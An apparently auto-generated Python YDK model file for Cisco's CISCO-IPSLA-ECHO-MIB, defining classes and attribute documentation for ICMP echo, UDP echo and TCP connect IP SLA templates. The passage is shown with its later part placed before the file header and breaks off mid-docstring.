Specifies the duration to wait for an IP SLA operation completion. For connection oriented protocols, this may cause the connection to be closed by the operation. Once closed, it will be assumed that the connection reestablishment will be performed. To prevent unwanted closure of connections, be sure to set this value to a realistic connection timeout
**type**\: int
**range:** 0..604800000
**units**\: milliseconds
.. attribute:: cipslaudpechotmplverifydata
When set to true, the resulting data in each IP SLA operation is compared with the expected data. This includes checking header information (if possible) and exact packet size
**type**\: bool
.. attribute:: cipslaudpechotmplreqdatasize
This object represents the number of octets to be placed into the ARR Data portion of the request message, when using SNA protocols. For non\-ARR protocols' RTT request/responses, this value represents the native payload size. REMEMBER\: The ARR Header overhead is not included in this value
**type**\: int
**range:** 4..1500
**units**\: octets
.. attribute:: cipslaudpechotmpltos
This object represents the type of service octet in an IP header
**type**\: int
**range:** 0..255
.. attribute:: cipslaudpechotmplvrfname
This field is used to specify the VRF name with which the IP SLA operation will be used. For regular IP SLA operation this field should not be configured. The agent will use this field to identify the VRF routing Table for this operation
**type**\: str
**length:** 0..32
.. attribute:: cipslaudpechotmplthreshold
This object defines an administrative threshold limit. If the IP SLA operation time exceeds this limit and if the condition specified in cipslaUdpEchoTmplHistFilter is satisfied, one threshold crossing occurrence will be counted
**type**\: int
**range:** 0..2147483647
**units**\: milliseconds
.. attribute:: cipslaudpechotmplhistlives
The maximum number of history lives to record. A life is defined by the countdown (or transition) to zero by the cipslaAutoGroupScheduleLife object. A new life is created when the same conceptual control row is restarted via the transition of the cipslaAutoGroupScheduleLife object and its subsequent countdown. The value of zero will shut off all data collection
**type**\: int
**range:** 0..2
.. attribute:: cipslaudpechotmplhistbuckets
The maximum number of history buckets to record. This value should be set to the number of operations to keep per lifetime. After cipslaUdpEchoTmplHistBuckets are filled, the oldest entries are deleted and the most recent cipslaUdpEchoTmplHistBuckets buckets are retained
**type**\: int
**range:** 1..60
.. attribute:: cipslaudpechotmplhistfilter
Defines a filter for adding RTT results to the history buffer\: none(1) \- no history is recorded all(2) \- the results of all completion times and failed completions are recorded overThreshold(3) \- the results of completion times over cipslaUdpEchoTmplThreshold are recorded. failures(4) \- the results of failed operations (only) are recorded
**type**\: :py:class:`CipslaUdpEchoTmplHistFilter <ydk.models.cisco_ios_xe.CISCO_IPSLA_ECHO_MIB.CISCOIPSLAECHOMIB.CipslaUdpEchoTmplTable.CipslaUdpEchoTmplEntry.CipslaUdpEchoTmplHistFilter>`
.. attribute:: cipslaudpechotmplstatshours
The maximum number of hours for which statistics are maintained. Specifically this is the number of hourly groups to keep before rolling over. The value of one is not advisable because the hourly group will close and immediately be deleted before the network management station will have the opportunity to retrieve the statistics. The value of zero will shut off data collection
**type**\: int
**range:** 0..25
**units**\: hours
.. attribute:: cipslaudpechotmpldistbuckets
The maximum number of statistical distribution buckets to accumulate. Since this index does not rollover, only the first cipslaUdpEchoTmplStatsNumDistBuckets will be kept. The last cipslaUdpEchoTmplStatsNumDistBuckets will contain all entries from its distribution interval start point to infinity
**type**\: int
**range:** 1..20
.. attribute:: cipslaudpechotmpldistinterval
The statistical distribution buckets interval. Distribution Bucket Example\: cipslaUdpEchoTmplDistBuckets = 5 buckets cipslaUdpEchoTmplDistInterval = 10 milliseconds \| Bucket 1 \| Bucket 2 \| Bucket 3 \| Bucket 4 \| Bucket 5 \| \| 0\-9 ms \| 10\-19 ms \| 20\-29 ms \| 30\-39 ms \| 40\-Inf ms \| Odd Example\: cipslaUdpEchoTmplDistBuckets = 1 buckets cipslaUdpEchoTmplDistInterval = 10 milliseconds \| Bucket 1 \| \| 0\-Inf ms \| Thus, this odd example shows that the value of cipslaUdpEchoTmplDistInterval does not apply when cipslaUdpEchoTmplDistBuckets is one
**type**\: int
**range:** 1..100
**units**\: milliseconds
.. attribute:: cipslaudpechotmplstoragetype
The storage type of this conceptual row
**type**\: :py:class:`StorageType <ydk.models.cisco_ios_xe.SNMPv2_TC.StorageType>`
.. attribute:: cipslaudpechotmplrowstatus
The status of the conceptual UDP echo template control row. When the status is active, all the read\-create objects in that row can be modified
**type**\: :py:class:`RowStatus <ydk.models.cisco_ios_xe.SNMPv2_TC.RowStatus>`
"""
_prefix = 'CISCO-IPSLA-ECHO-MIB'
_revision = '2007-08-16'
def __init__(self):
super(CISCOIPSLAECHOMIB.CipslaUdpEchoTmplTable.CipslaUdpEchoTmplEntry, self).__init__()
self.yang_name = "cipslaUdpEchoTmplEntry"
self.yang_parent_name = "cipslaUdpEchoTmplTable"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = ['cipslaudpechotmplname']
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('cipslaudpechotmplname', (YLeaf(YType.str, 'cipslaUdpEchoTmplName'), ['str'])),
('cipslaudpechotmpldescription', (YLeaf(YType.str, 'cipslaUdpEchoTmplDescription'), ['str'])),
('cipslaudpechotmplcontrolenable', (YLeaf(YType.boolean, 'cipslaUdpEchoTmplControlEnable'), ['bool'])),
('cipslaudpechotmplsrcaddrtype', (YLeaf(YType.enumeration, 'cipslaUdpEchoTmplSrcAddrType'), [('ydk.models.cisco_ios_xe.INET_ADDRESS_MIB', 'InetAddressType', '')])),
('cipslaudpechotmplsrcaddr', (YLeaf(YType.str, 'cipslaUdpEchoTmplSrcAddr'), ['str'])),
('cipslaudpechotmplsrcport', (YLeaf(YType.uint16, 'cipslaUdpEchoTmplSrcPort'), ['int'])),
('cipslaudpechotmpltimeout', (YLeaf(YType.uint32, 'cipslaUdpEchoTmplTimeOut'), ['int'])),
('cipslaudpechotmplverifydata', (YLeaf(YType.boolean, 'cipslaUdpEchoTmplVerifyData'), ['bool'])),
('cipslaudpechotmplreqdatasize', (YLeaf(YType.uint32, 'cipslaUdpEchoTmplReqDataSize'), ['int'])),
('cipslaudpechotmpltos', (YLeaf(YType.uint32, 'cipslaUdpEchoTmplTOS'), ['int'])),
('cipslaudpechotmplvrfname', (YLeaf(YType.str, 'cipslaUdpEchoTmplVrfName'), ['str'])),
('cipslaudpechotmplthreshold', (YLeaf(YType.uint32, 'cipslaUdpEchoTmplThreshold'), ['int'])),
('cipslaudpechotmplhistlives', (YLeaf(YType.uint32, 'cipslaUdpEchoTmplHistLives'), ['int'])),
('cipslaudpechotmplhistbuckets', (YLeaf(YType.uint32, 'cipslaUdpEchoTmplHistBuckets'), ['int'])),
('cipslaudpechotmplhistfilter', (YLeaf(YType.enumeration, 'cipslaUdpEchoTmplHistFilter'), [('ydk.models.cisco_ios_xe.CISCO_IPSLA_ECHO_MIB', 'CISCOIPSLAECHOMIB', 'CipslaUdpEchoTmplTable.CipslaUdpEchoTmplEntry.CipslaUdpEchoTmplHistFilter')])),
('cipslaudpechotmplstatshours', (YLeaf(YType.uint32, 'cipslaUdpEchoTmplStatsHours'), ['int'])),
('cipslaudpechotmpldistbuckets', (YLeaf(YType.uint32, 'cipslaUdpEchoTmplDistBuckets'), ['int'])),
('cipslaudpechotmpldistinterval', (YLeaf(YType.uint32, 'cipslaUdpEchoTmplDistInterval'), ['int'])),
('cipslaudpechotmplstoragetype', (YLeaf(YType.enumeration, 'cipslaUdpEchoTmplStorageType'), [('ydk.models.cisco_ios_xe.SNMPv2_TC', 'StorageType', '')])),
('cipslaudpechotmplrowstatus', (YLeaf(YType.enumeration, 'cipslaUdpEchoTmplRowStatus'), [('ydk.models.cisco_ios_xe.SNMPv2_TC', 'RowStatus', '')])),
])
self.cipslaudpechotmplname = None
self.cipslaudpechotmpldescription = None
self.cipslaudpechotmplcontrolenable = None
self.cipslaudpechotmplsrcaddrtype = None
self.cipslaudpechotmplsrcaddr = None
self.cipslaudpechotmplsrcport = None
self.cipslaudpechotmpltimeout = None
self.cipslaudpechotmplverifydata = None
self.cipslaudpechotmplreqdatasize = None
self.cipslaudpechotmpltos = None
self.cipslaudpechotmplvrfname = None
self.cipslaudpechotmplthreshold = None
self.cipslaudpechotmplhistlives = None
self.cipslaudpechotmplhistbuckets = None
self.cipslaudpechotmplhistfilter = None
self.cipslaudpechotmplstatshours = None
self.cipslaudpechotmpldistbuckets = None
self.cipslaudpechotmpldistinterval = None
self.cipslaudpechotmplstoragetype = None
self.cipslaudpechotmplrowstatus = None
self._segment_path = lambda: "cipslaUdpEchoTmplEntry" + "[cipslaUdpEchoTmplName='" + str(self.cipslaudpechotmplname) + "']"
self._absolute_path = lambda: "CISCO-IPSLA-ECHO-MIB:CISCO-IPSLA-ECHO-MIB/cipslaUdpEchoTmplTable/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(CISCOIPSLAECHOMIB.CipslaUdpEchoTmplTable.CipslaUdpEchoTmplEntry, ['cipslaudpechotmplname', 'cipslaudpechotmpldescription', 'cipslaudpechotmplcontrolenable', 'cipslaudpechotmplsrcaddrtype', 'cipslaudpechotmplsrcaddr', 'cipslaudpechotmplsrcport', 'cipslaudpechotmpltimeout', 'cipslaudpechotmplverifydata', 'cipslaudpechotmplreqdatasize', 'cipslaudpechotmpltos', 'cipslaudpechotmplvrfname', 'cipslaudpechotmplthreshold', 'cipslaudpechotmplhistlives', 'cipslaudpechotmplhistbuckets', 'cipslaudpechotmplhistfilter', 'cipslaudpechotmplstatshours', 'cipslaudpechotmpldistbuckets', 'cipslaudpechotmpldistinterval', 'cipslaudpechotmplstoragetype', 'cipslaudpechotmplrowstatus'], name, value)
class CipslaUdpEchoTmplHistFilter(Enum):
"""
CipslaUdpEchoTmplHistFilter (Enum Class)
Defines a filter for adding RTT results to the history
buffer\:
none(1) \- no history is recorded
all(2) \- the results of all completion times
and failed completions are recorded
overThreshold(3) \- the results of completion times
over cipslaUdpEchoTmplThreshold are
recorded.
failures(4) \- the results of failed operations (only)
are recorded.
.. data:: none = 1
.. data:: all = 2
.. data:: overThreshold = 3
.. data:: failures = 4
"""
none = Enum.YLeaf(1, "none")
all = Enum.YLeaf(2, "all")
overThreshold = Enum.YLeaf(3, "overThreshold")
failures = Enum.YLeaf(4, "failures")
class CipslaTcpConnTmplTable(Entity):
"""
A table that contains TCP connect template specific definitions.
.. attribute:: cipslatcpconntmplentry
A row entry representing an IPSLA TCP connect template
**type**\: list of :py:class:`CipslaTcpConnTmplEntry <ydk.models.cisco_ios_xe.CISCO_IPSLA_ECHO_MIB.CISCOIPSLAECHOMIB.CipslaTcpConnTmplTable.CipslaTcpConnTmplEntry>`
"""
_prefix = 'CISCO-IPSLA-ECHO-MIB'
_revision = '2007-08-16'
def __init__(self):
super(CISCOIPSLAECHOMIB.CipslaTcpConnTmplTable, self).__init__()
self.yang_name = "cipslaTcpConnTmplTable"
self.yang_parent_name = "CISCO-IPSLA-ECHO-MIB"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("cipslaTcpConnTmplEntry", ("cipslatcpconntmplentry", CISCOIPSLAECHOMIB.CipslaTcpConnTmplTable.CipslaTcpConnTmplEntry))])
self._leafs = OrderedDict()
self.cipslatcpconntmplentry = YList(self)
self._segment_path = lambda: "cipslaTcpConnTmplTable"
self._absolute_path = lambda: "CISCO-IPSLA-ECHO-MIB:CISCO-IPSLA-ECHO-MIB/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(CISCOIPSLAECHOMIB.CipslaTcpConnTmplTable, [], name, value)
class CipslaTcpConnTmplEntry(Entity):
"""
A row entry representing an IPSLA TCP connect template.
.. attribute:: cipslatcpconntmplname (key)
A string which specifies the TCP connect template name
**type**\: str
**length:** 1..64
.. attribute:: cipslatcpconntmpldescription
A string which provides description for the TCP connect template
**type**\: str
**length:** 0..128
.. attribute:: cipslatcpconntmplcontrolenable
If this object is enabled, then the IP SLA application will send control messages to a responder, residing on the target router to respond to the data request packets being sent by the source router
**type**\: bool
.. attribute:: cipslatcpconntmplsrcaddrtype
An enumerated value which specifies the IP address type of the source. It must be used along with the cipslaTcpConnTmplSrcAddr object
**type**\: :py:class:`InetAddressType <ydk.models.cisco_ios_xe.INET_ADDRESS_MIB.InetAddressType>`
.. attribute:: cipslatcpconntmplsrcaddr
A string which specifies the IP address of the source
**type**\: str
**length:** 0..255
.. attribute:: cipslatcpconntmplsrcport
This object represents the source's port number. If this object is not specified, the application will get a port allocated by the system
**type**\: int
**range:** 0..65535
.. attribute:: cipslatcpconntmpltimeout
Specifies the duration to wait for an IP SLA operation completion. For connection oriented protocols, this may cause the connection to be closed by the operation. Once closed, it will be assumed that the connection reestablishment will be performed. To prevent unwanted closure of connections, be sure to set this value to a realistic connection timeout
**type**\: int
**range:** 0..604800000
**units**\: milliseconds
.. attribute:: cipslatcpconntmplverifydata
When set to true, the resulting data in each IP SLA operation is compared with the expected data. This includes checking header information (if possible) and exact packet size
**type**\: bool
.. attribute:: cipslatcpconntmpltos
This object represents the type of service octet in an IP header
**type**\: int
**range:** 0..255
.. attribute:: cipslatcpconntmplthreshold
This object defines an administrative threshold limit. If the IP SLA operation time exceeds this limit and if the condition specified in cipslaTcpConnTmplHistFilter is satisfied, one threshold crossing occurrence will be counted
**type**\: int
**range:** 0..2147483647
**units**\: milliseconds
.. attribute:: cipslatcpconntmplhistlives
The maximum number of history lives to record. A life is defined by the countdown (or transition) to zero by the cipslaAutoGroupScheduleLife object. A new life is created when the same conceptual control row is restarted via the transition of the cipslaAutoGroupScheduleLife object and its subsequent countdown. The value of zero will shut off all data collection
**type**\: int
**range:** 0..2
.. attribute:: cipslatcpconntmplhistbuckets
The maximum number of history buckets to record. This value should be set to the number of operations to keep per lifetime. After cipslaTcpConnTmplHistBuckets are filled, the oldest entries are deleted and the most recent cipslaTcpConnTmplHistBuckets buckets are retained
**type**\: int
**range:** 1..60
.. attribute:: cipslatcpconntmplhistfilter
Defines a filter for adding RTT results to the history buffer\: none(1) \- no history is recorded all(2) \- the results of all completion times and failed completions are recorded overThreshold(3) \- the results of completion times over cipslaTcpConnTmplThreshold are recorded. failures(4) \- the results of failed operations (only) are recorded
**type**\: :py:class:`CipslaTcpConnTmplHistFilter <ydk.models.cisco_ios_xe.CISCO_IPSLA_ECHO_MIB.CISCOIPSLAECHOMIB.CipslaTcpConnTmplTable.CipslaTcpConnTmplEntry.CipslaTcpConnTmplHistFilter>`
.. attribute:: cipslatcpconntmplstatshours
The maximum number of hours for which statistics are maintained. Specifically this is the number of hourly groups to keep before rolling over. The value of one is not advisable because the hourly group will close and immediately be deleted before the network management station will have the opportunity to retrieve the statistics. The value of zero will shut off data collection
**type**\: int
**range:** 0..25
**units**\: hours
.. attribute:: cipslatcpconntmpldistbuckets
The maximum number of statistical distribution buckets to accumulate. Since this index does not rollover, only the first cipslaTcpConnTmplDistBuckets will be kept. The last cipslaTcpConnTmplDistBuckets will contain all entries from its distribution interval start point to infinity
**type**\: int
**range:** 1..20
.. attribute:: cipslatcpconntmpldistinterval
The statistical distribution buckets interval. Distribution Bucket Example\: cipslaTcpConnTmplDistBuckets = 5 buckets cipslaTcpConnTmplDistInterval = 10 milliseconds \| Bucket 1 \| Bucket 2 \| Bucket 3 \| Bucket 4 \| Bucket 5 \| \| 0\-9 ms \| 10\-19 ms \| 20\-29 ms \| 30\-39 ms \| 40\-Inf ms \| Odd Example\: cipslaTcpConnTmplDistBuckets = 1 buckets cipslaTcpConnTmplDistInterval = 10 milliseconds \| Bucket 1 \| \| 0\-Inf ms \| Thus, this odd example shows that the value of cipslaTcpConnTmplDistInterval does not apply when cipslaTcpConnTmplDistBuckets is one
**type**\: int
**range:** 1..100
**units**\: milliseconds
.. attribute:: cipslatcpconntmplstoragetype
The storage type of this conceptual row
**type**\: :py:class:`StorageType <ydk.models.cisco_ios_xe.SNMPv2_TC.StorageType>`
.. attribute:: cipslatcpconntmplrowstatus
The status of the conceptual tcp connect control row. When the status is active, all the read\-create objects in that row can be modified
**type**\: :py:class:`RowStatus <ydk.models.cisco_ios_xe.SNMPv2_TC.RowStatus>`
"""
_prefix = 'CISCO-IPSLA-ECHO-MIB'
_revision = '2007-08-16'
def __init__(self):
super(CISCOIPSLAECHOMIB.CipslaTcpConnTmplTable.CipslaTcpConnTmplEntry, self).__init__()
self.yang_name = "cipslaTcpConnTmplEntry"
self.yang_parent_name = "cipslaTcpConnTmplTable"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = ['cipslatcpconntmplname']
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('cipslatcpconntmplname', (YLeaf(YType.str, 'cipslaTcpConnTmplName'), ['str'])),
('cipslatcpconntmpldescription', (YLeaf(YType.str, 'cipslaTcpConnTmplDescription'), ['str'])),
('cipslatcpconntmplcontrolenable', (YLeaf(YType.boolean, 'cipslaTcpConnTmplControlEnable'), ['bool'])),
('cipslatcpconntmplsrcaddrtype', (YLeaf(YType.enumeration, 'cipslaTcpConnTmplSrcAddrType'), [('ydk.models.cisco_ios_xe.INET_ADDRESS_MIB', 'InetAddressType', '')])),
('cipslatcpconntmplsrcaddr', (YLeaf(YType.str, 'cipslaTcpConnTmplSrcAddr'), ['str'])),
('cipslatcpconntmplsrcport', (YLeaf(YType.uint16, 'cipslaTcpConnTmplSrcPort'), ['int'])),
('cipslatcpconntmpltimeout', (YLeaf(YType.uint32, 'cipslaTcpConnTmplTimeOut'), ['int'])),
('cipslatcpconntmplverifydata', (YLeaf(YType.boolean, 'cipslaTcpConnTmplVerifyData'), ['bool'])),
('cipslatcpconntmpltos', (YLeaf(YType.uint32, 'cipslaTcpConnTmplTOS'), ['int'])),
('cipslatcpconntmplthreshold', (YLeaf(YType.uint32, 'cipslaTcpConnTmplThreshold'), ['int'])),
('cipslatcpconntmplhistlives', (YLeaf(YType.uint32, 'cipslaTcpConnTmplHistLives'), ['int'])),
('cipslatcpconntmplhistbuckets', (YLeaf(YType.uint32, 'cipslaTcpConnTmplHistBuckets'), ['int'])),
('cipslatcpconntmplhistfilter', (YLeaf(YType.enumeration, 'cipslaTcpConnTmplHistFilter'), [('ydk.models.cisco_ios_xe.CISCO_IPSLA_ECHO_MIB', 'CISCOIPSLAECHOMIB', 'CipslaTcpConnTmplTable.CipslaTcpConnTmplEntry.CipslaTcpConnTmplHistFilter')])),
('cipslatcpconntmplstatshours', (YLeaf(YType.uint32, 'cipslaTcpConnTmplStatsHours'), ['int'])),
('cipslatcpconntmpldistbuckets', (YLeaf(YType.uint32, 'cipslaTcpConnTmplDistBuckets'), ['int'])),
('cipslatcpconntmpldistinterval', (YLeaf(YType.uint32, 'cipslaTcpConnTmplDistInterval'), ['int'])),
('cipslatcpconntmplstoragetype', (YLeaf(YType.enumeration, 'cipslaTcpConnTmplStorageType'), [('ydk.models.cisco_ios_xe.SNMPv2_TC', 'StorageType', '')])),
('cipslatcpconntmplrowstatus', (YLeaf(YType.enumeration, 'cipslaTcpConnTmplRowStatus'), [('ydk.models.cisco_ios_xe.SNMPv2_TC', 'RowStatus', '')])),
])
self.cipslatcpconntmplname = None
self.cipslatcpconntmpldescription = None
self.cipslatcpconntmplcontrolenable = None
self.cipslatcpconntmplsrcaddrtype = None
self.cipslatcpconntmplsrcaddr = None
self.cipslatcpconntmplsrcport = None
self.cipslatcpconntmpltimeout = None
self.cipslatcpconntmplverifydata = None
self.cipslatcpconntmpltos = None
self.cipslatcpconntmplthreshold = None
self.cipslatcpconntmplhistlives = None
self.cipslatcpconntmplhistbuckets = None
self.cipslatcpconntmplhistfilter = None
self.cipslatcpconntmplstatshours = None
self.cipslatcpconntmpldistbuckets = None
self.cipslatcpconntmpldistinterval = None
self.cipslatcpconntmplstoragetype = None
self.cipslatcpconntmplrowstatus = None
self._segment_path = lambda: "cipslaTcpConnTmplEntry" + "[cipslaTcpConnTmplName='" + str(self.cipslatcpconntmplname) + "']"
self._absolute_path = lambda: "CISCO-IPSLA-ECHO-MIB:CISCO-IPSLA-ECHO-MIB/cipslaTcpConnTmplTable/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(CISCOIPSLAECHOMIB.CipslaTcpConnTmplTable.CipslaTcpConnTmplEntry, ['cipslatcpconntmplname', 'cipslatcpconntmpldescription', 'cipslatcpconntmplcontrolenable', 'cipslatcpconntmplsrcaddrtype', 'cipslatcpconntmplsrcaddr', 'cipslatcpconntmplsrcport', 'cipslatcpconntmpltimeout', 'cipslatcpconntmplverifydata', 'cipslatcpconntmpltos', 'cipslatcpconntmplthreshold', 'cipslatcpconntmplhistlives', 'cipslatcpconntmplhistbuckets', 'cipslatcpconntmplhistfilter', 'cipslatcpconntmplstatshours', 'cipslatcpconntmpldistbuckets', 'cipslatcpconntmpldistinterval', 'cipslatcpconntmplstoragetype', 'cipslatcpconntmplrowstatus'], name, value)
class CipslaTcpConnTmplHistFilter(Enum):
"""
CipslaTcpConnTmplHistFilter (Enum Class)
Defines a filter for adding RTT results to the history
buffer\:
none(1) \- no history is recorded
all(2) \- the results of all completion times
and failed completions are recorded
overThreshold(3) \- the results of completion times
over cipslaTcpConnTmplThreshold are
recorded.
failures(4) \- the results of failed operations (only)
are recorded.
.. data:: none = 1
.. data:: all = 2
.. data:: overThreshold = 3
.. data:: failures = 4
"""
none = Enum.YLeaf(1, "none")
all = Enum.YLeaf(2, "all")
overThreshold = Enum.YLeaf(3, "overThreshold")
failures = Enum.YLeaf(4, "failures")
def clone_ptr(self):
self._top_entity = CISCOIPSLAECHOMIB()
return self._top_entity
| <filename>cisco-ios-xe/ydk/models/cisco_ios_xe/CISCO_IPSLA_ECHO_MIB.py
""" CISCO_IPSLA_ECHO_MIB
This MIB module defines the templates for IP SLA operations of
ICMP echo, UDP echo and TCP connect.
The ICMP echo operation measures end\-to\-end response time between
a Cisco router and any IP enabled device by computing the time
taken between sending an ICMP echo request message to the
destination and receiving an ICMP echo reply.
The UDP echo operation measures end\-to\-end response time between
a Cisco router and any IP enabled device by computing the time
taken between sending an UDP echo request message to the
destination and receiving an UDP echo reply.
The TCP connect operation measures end\-to\-end response time between
a Cisco router and any IP enabled device by computing the time
taken to perform a TCP connect operation.
"""
from collections import OrderedDict
from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64
from ydk.filters import YFilter
from ydk.errors import YError, YModelError
from ydk.errors.error_handler import handle_type_error as _handle_type_error
class CISCOIPSLAECHOMIB(Entity):
"""
.. attribute:: cipslaicmpechotmpltable
A table that contains ICMP echo template definitions
**type**\: :py:class:`CipslaIcmpEchoTmplTable <ydk.models.cisco_ios_xe.CISCO_IPSLA_ECHO_MIB.CISCOIPSLAECHOMIB.CipslaIcmpEchoTmplTable>`
.. attribute:: cipslaudpechotmpltable
A table that contains UDP echo template specific definitions
**type**\: :py:class:`CipslaUdpEchoTmplTable <ydk.models.cisco_ios_xe.CISCO_IPSLA_ECHO_MIB.CISCOIPSLAECHOMIB.CipslaUdpEchoTmplTable>`
.. attribute:: cipslatcpconntmpltable
A table that contains TCP connect template specific definitions
**type**\: :py:class:`CipslaTcpConnTmplTable <ydk.models.cisco_ios_xe.CISCO_IPSLA_ECHO_MIB.CISCOIPSLAECHOMIB.CipslaTcpConnTmplTable>`
"""
_prefix = 'CISCO-IPSLA-ECHO-MIB'
_revision = '2007-08-16'
def __init__(self):
super(CISCOIPSLAECHOMIB, self).__init__()
self._top_entity = None
self.yang_name = "CISCO-IPSLA-ECHO-MIB"
self.yang_parent_name = "CISCO-IPSLA-ECHO-MIB"
self.is_top_level_class = True
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("cipslaIcmpEchoTmplTable", ("cipslaicmpechotmpltable", CISCOIPSLAECHOMIB.CipslaIcmpEchoTmplTable)), ("cipslaUdpEchoTmplTable", ("cipslaudpechotmpltable", CISCOIPSLAECHOMIB.CipslaUdpEchoTmplTable)), ("cipslaTcpConnTmplTable", ("cipslatcpconntmpltable", CISCOIPSLAECHOMIB.CipslaTcpConnTmplTable))])
self._leafs = OrderedDict()
self.cipslaicmpechotmpltable = CISCOIPSLAECHOMIB.CipslaIcmpEchoTmplTable()
self.cipslaicmpechotmpltable.parent = self
self._children_name_map["cipslaicmpechotmpltable"] = "cipslaIcmpEchoTmplTable"
self.cipslaudpechotmpltable = CISCOIPSLAECHOMIB.CipslaUdpEchoTmplTable()
self.cipslaudpechotmpltable.parent = self
self._children_name_map["cipslaudpechotmpltable"] = "cipslaUdpEchoTmplTable"
self.cipslatcpconntmpltable = CISCOIPSLAECHOMIB.CipslaTcpConnTmplTable()
self.cipslatcpconntmpltable.parent = self
self._children_name_map["cipslatcpconntmpltable"] = "cipslaTcpConnTmplTable"
self._segment_path = lambda: "CISCO-IPSLA-ECHO-MIB:CISCO-IPSLA-ECHO-MIB"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(CISCOIPSLAECHOMIB, [], name, value)
class CipslaIcmpEchoTmplTable(Entity):
"""
A table that contains ICMP echo template definitions.
.. attribute:: cipslaicmpechotmplentry
A row entry representing an IPSLA ICMP echo template
**type**\: list of :py:class:`CipslaIcmpEchoTmplEntry <ydk.models.cisco_ios_xe.CISCO_IPSLA_ECHO_MIB.CISCOIPSLAECHOMIB.CipslaIcmpEchoTmplTable.CipslaIcmpEchoTmplEntry>`
"""
_prefix = 'CISCO-IPSLA-ECHO-MIB'
_revision = '2007-08-16'
def __init__(self):
super(CISCOIPSLAECHOMIB.CipslaIcmpEchoTmplTable, self).__init__()
self.yang_name = "cipslaIcmpEchoTmplTable"
self.yang_parent_name = "CISCO-IPSLA-ECHO-MIB"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("cipslaIcmpEchoTmplEntry", ("cipslaicmpechotmplentry", CISCOIPSLAECHOMIB.CipslaIcmpEchoTmplTable.CipslaIcmpEchoTmplEntry))])
self._leafs = OrderedDict()
self.cipslaicmpechotmplentry = YList(self)
self._segment_path = lambda: "cipslaIcmpEchoTmplTable"
self._absolute_path = lambda: "CISCO-IPSLA-ECHO-MIB:CISCO-IPSLA-ECHO-MIB/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(CISCOIPSLAECHOMIB.CipslaIcmpEchoTmplTable, [], name, value)
class CipslaIcmpEchoTmplEntry(Entity):
"""
A row entry representing an IPSLA ICMP echo template.
.. attribute:: cipslaicmpechotmplname (key)
This field is used to specify the ICMP echo template name
**type**\: str
**length:** 1..64
.. attribute:: cipslaicmpechotmpldescription
This field is used to provide description for the ICMP echo template
**type**\: str
**length:** 0..128
.. attribute:: cipslaicmpechotmplsrcaddrtype
An enumerated value which specifies the IP address type of the source. It must be used along with the cipslaIcmpEchoTmplSrcAddr object
**type**\: :py:class:`InetAddressType <ydk.models.cisco_ios_xe.INET_ADDRESS_MIB.InetAddressType>`
.. attribute:: cipslaicmpechotmplsrcaddr
A string which specifies the IP address of the source
**type**\: str
**length:** 0..255
.. attribute:: cipslaicmpechotmpltimeout
Specifies the duration to wait for a IP SLA operation completion. For connection oriented protocols, this may cause the connection to be closed by the operation. Once closed, it will be assumed that the connection reestablishment will be performed. To prevent unwanted closure of connections, be sure to set this value to a realistic connection timeout
**type**\: int
**range:** 0..604800000
**units**\: milliseconds
.. attribute:: cipslaicmpechotmplverifydata
When set to true, the resulting data in each IP SLA operation is compared with the expected data. This includes checking header information (if possible) and exact packet size
**type**\: bool
.. attribute:: cipslaicmpechotmplreqdatasize
This object represents the number of octets to be placed into the ARR Data portion of the request message, when using SNA protocols. For non\-ARR protocols' IP SLA request/responses, this value represents the native payload size. REMEMBER\: The ARR Header overhead is not included in this value
**type**\: int
**range:** 0..16384
**units**\: octets
.. attribute:: cipslaicmpechotmpltos
This object represents the type of service octet in an IP header
**type**\: int
**range:** 0..255
.. attribute:: cipslaicmpechotmplvrfname
This field is used to specify the VRF name with which the IP SLA operation will be used. For regular IP SLA operation this field should not be configured. The agent will use this field to identify the VRF routing table for this operation
**type**\: str
**length:** 0..32
.. attribute:: cipslaicmpechotmplthreshold
This object defines an administrative threshold limit. If the IP SLA operation time exceeds this limit and if the condition specified in cipslaIcmpEchoTmplHistFilter is satisfied, one threshold crossing occurrence will be counted
**type**\: int
**range:** 0..2147483647
**units**\: milliseconds
.. attribute:: cipslaicmpechotmplhistlives
The maximum number of history lives to record. A life is defined by the countdown (or transition) to zero by the cipslaAutoGroupScheduleLife object. A new life is created when the same conceptual control row is restarted via the transition of the cipslaAutoGroupScheduleLife object and its subsequent countdown. The value of zero will shut off all data collection
**type**\: int
**range:** 0..2
.. attribute:: cipslaicmpechotmplhistbuckets
The maximum number of history buckets to record. This value is set to the number of operations to keep per lifetime. After cipslaIcmpEchoTmplHistBuckets are filled, the oldest entries are deleted and the most recent cipslaIcmpEchoTmplHistBuckets buckets are retained
**type**\: int
**range:** 1..60
.. attribute:: cipslaicmpechotmplhistfilter
Defines a filter for adding RTT results to the history buffer\: none(1) \- no history is recorded all(2) \- the results of all completion times and failed completions are recorded overThreshold(3) \- the results of completion times over cipslaIcmpEchoTmplThreshold are recorded. failures(4) \- the results of failed operations (only) are recorded
**type**\: :py:class:`CipslaIcmpEchoTmplHistFilter <ydk.models.cisco_ios_xe.CISCO_IPSLA_ECHO_MIB.CISCOIPSLAECHOMIB.CipslaIcmpEchoTmplTable.CipslaIcmpEchoTmplEntry.CipslaIcmpEchoTmplHistFilter>`
.. attribute:: cipslaicmpechotmplstatshours
The maximum number of hours for which statistics are maintained. Specifically this is the number of hourly groups to keep before rolling over. The value of one is not advisable because the hourly group will close and immediately be deleted before the network management station will have the opportunity to retrieve the statistics. The value of zero will shut off data collection
**type**\: int
**range:** 0..25
**units**\: hours
.. attribute:: cipslaicmpechotmpldistbuckets
